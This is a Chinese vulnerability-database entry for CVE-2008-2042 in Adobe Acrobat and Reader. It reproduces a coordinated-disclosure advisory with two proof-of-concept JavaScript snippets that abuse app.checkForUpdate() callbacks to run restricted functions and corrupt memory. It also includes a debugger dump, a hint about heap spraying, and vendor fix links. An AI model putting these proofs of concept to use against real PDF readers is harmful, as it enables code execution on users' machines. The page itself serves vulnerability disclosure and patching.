Adobe Acrobat和Reader多个安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1187748 漏洞类型 输入验证
发布时间 2008-02-06 更新时间 2009-01-29
CVE编号 CVE-2008-2042 CNNVD-ID CNNVD-200805-062
漏洞平台 N/A CVSS评分 9.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2008050050
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-062
|漏洞详情
AdobeAcrobat和Reader都是流行的PDF文件阅读器。AdobeReader/Acrobat中的多个安全漏洞可能允许攻击者导致拒绝服务或完全入侵用户系统。1)一些JavaScript方式中的多个栈溢出漏洞允许用户通过特制的.PDF文件导致执行任意指令。目前这个漏洞正在被积极的利用。2)EScript.api中不安全的JavaScript方式允许通过特制的.PDF文件导致执行任意指令。3)加载SecurityProvider库时存在漏洞,如果用户受骗在包含有与SecurityProvider库同名的恶意库的目录中打开了PDF文件的话,就会导致执行任意指令。4)DOC.print()中不安全的JavaScript方式允许在用户不知情的情况下打印特制的PDF文件。5)printSepsWithParams()JavaScript方式中的整数溢出可能会导致内存破坏。
|漏洞EXP
Adobe Acrobat Professional Javascript For PDF Security Feature Bypass
and Memory Corruption Vulnerabilities

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net

Summary:

Two critical vulnerabilities exist in the javascript API of Adobe
Acrobat Professional 7. A remote attacker who successfully exploits
these vulnerabilities can execute restricted functions and arbitrary
codes on the affected system.

Affected Software Versions:

Adobe Acrobat Professional 7.0.9

Details:

These two vulnerabilities specially exist in an unpublicized
fucntion called "app.checkForUpdate()", which are exploited through a
callback function.

Following is the POC for how to execute restricted functions:

function	myCallBack()
	{
		app.alert("It will call app.newDoc()");
		app.newDoc();
		app.alert("function has been called");
	}

app.checkForUpdate
	({
		cType:"AAAA",
		cName:"BBBB",
		oCallback:myCallBack,
		cVer:"CCCC",
		cMsg:"DDDD",
		oParams:myCallBack
	});

As we know, when we call "app.newDoc()" normally, the function can
not be executed because of the security feature of PDF's javascript,
but the above code can still execute this function successfully, other
restricted functions can also be executed by exploiting this
vulnerability.

The POC for triggering the memory corruption vulnerability:

function	myCallBack()
	{
		app.alert("Corrupting the memory");

// Open a new report will corrupt the memory
		var rep = new Report();

app.alert("If the application has not been crashed, try to close the
application and then you will get it.");
	}

app.checkForUpdate
	({
		cType:"AAAA",
		cName:"BBBB",
		oCallback:myCallBack,
		cVer:"CCCC",
		cMsg:"DDDD",
		oParams:myCallBack
	});

When we call the function "new Report()"(other functions maybe
useful too) in the function "Callback", it will corrupt the memory.
Debug informations from Windbg as follows:

First chance exceptions are reported before any exception handling.
	This exception may be expected and handled.
	eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
	eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0         nv up ei pl nz na po nc
	cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
	exlang32+0x101010:
	10101010 001b            add     byte ptr [ebx],bl          ds:0023:00000040=??
	0:000> u eip
	exlang32+0x101010:
	10101010 001b            add     byte ptr [ebx],bl
	10101012 6c              ins     byte ptr es:[edi],dx
	10101013 0000            add     byte ptr [eax],al
	10101015 1b640000        sbb     esp,dword ptr [eax+eax]
	10101019 336000          xor     esp,dword ptr [eax]
	1010101c 0033            add     byte ptr [ebx],dh
	1010101e 60              pushad
	1010101f 0000            add     byte ptr [eax],al

It is running codes at an unexpected address.

Using the heap spray technology of javascript in PDF can develop a
working exploit for this vulnerability easily.

Note that because the special API does NOT exist in Adobe
Reader/Acrobat 8, as my test, the vulnerability does NOT affect Adobe
Reader/Acrobat 8.

Solution:

Adobe has released an advisory for this vulnerability which is available on:

http://www.adobe.com/support/security/bulletins/apsb08-13.html

Fortinet advisory can be found at:

http://www.fortiguardcenter.com

CVE Information:

CVE-2008-2042

Disclosure Timeline:

2007.11.01        Vendor notified via email
    2007.11.02        Vendor responded
    2008.05.06        Coordinated public disclosure

--EOF--
|参考资料

来源:XF
名称:adobe-appcheckforupdate-code-execution(42237)
链接:http://xforce.iss.net/xforce/xfdb/42237
来源:BUGTRAQ
名称:20080507AdobeAcrobatProfessionalJavascriptForPDFSecurityFeatureBypassandMemoryCorruptionVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/491735/100/0/threaded
来源:VUPEN
名称:ADV-2008-1966
链接:http://www.frsirt.com/english/advisories/2008/1966/references
来源:www.adobe.com
链接:http://www.adobe.com/support/security/bulletins/apsb08-13.html
来源:SUNALERT
名称:239286
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-239286-1
来源:SECTRACK
名称:1019971
链接:http://securitytracker.com/id?1019971
来源:SREASON
名称:3861
链接:http://securityreason.com/securityalert/3861
来源:SECUNIA
名称:30840
链接:http://secunia.com/advisories/30840